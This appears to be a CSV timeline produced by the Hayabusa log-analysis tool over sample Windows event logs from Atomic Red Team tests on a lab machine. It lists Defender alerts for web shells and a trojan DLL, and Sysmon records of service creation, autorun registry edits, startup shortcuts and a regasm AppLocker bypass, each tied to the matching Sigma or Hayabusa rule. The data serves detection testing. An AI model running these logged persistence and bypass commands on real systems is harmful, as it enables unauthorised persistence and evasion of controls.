2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat  :  Severity: High  :  Type: Tool  :  User: MSEDGEWIN10\IEUser  :  Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005)  :  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T  :  Severity: Severe  :  Type: Backdoor  :  User: MSEDGEWIN10\IEUser  :  Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx  :  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl  :  Severity: Severe  :  Type: Trojan  :  User: MSEDGEWIN10\IEUser  :  Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll  :  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:51:50.275 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat  :  Severity: High  :  Type: Tool  :  User: MSEDGEWIN10\IEUser  :  Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068)  :  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:53:31.900 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:53:31.902 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:53:31.952 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA21C70  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management  :  Command: sc.exe  create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe  :  Path: C:\Windows\System32\sc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,New Service Creation,,rules/sigma/process_creation/win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management  :  Command: sc.exe  start AtomicTestService  :  Path: C:\Windows\System32\sc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe  :  Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management  :  Command: sc.exe  stop AtomicTestService  :  Path: C:\Windows\System32\sc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management  :  Command: sc.exe  delete AtomicTestService  :  Path: C:\Windows\System32\sc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe  :  Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG  ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG  DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG  ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d  C:\Path\AtomicRedTeam.dll  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.213 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG  DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Startup Folder File Write,,rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,high,PowerShell Writing Startup Shortcuts,,rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP""  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe  /U T1121.dll  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
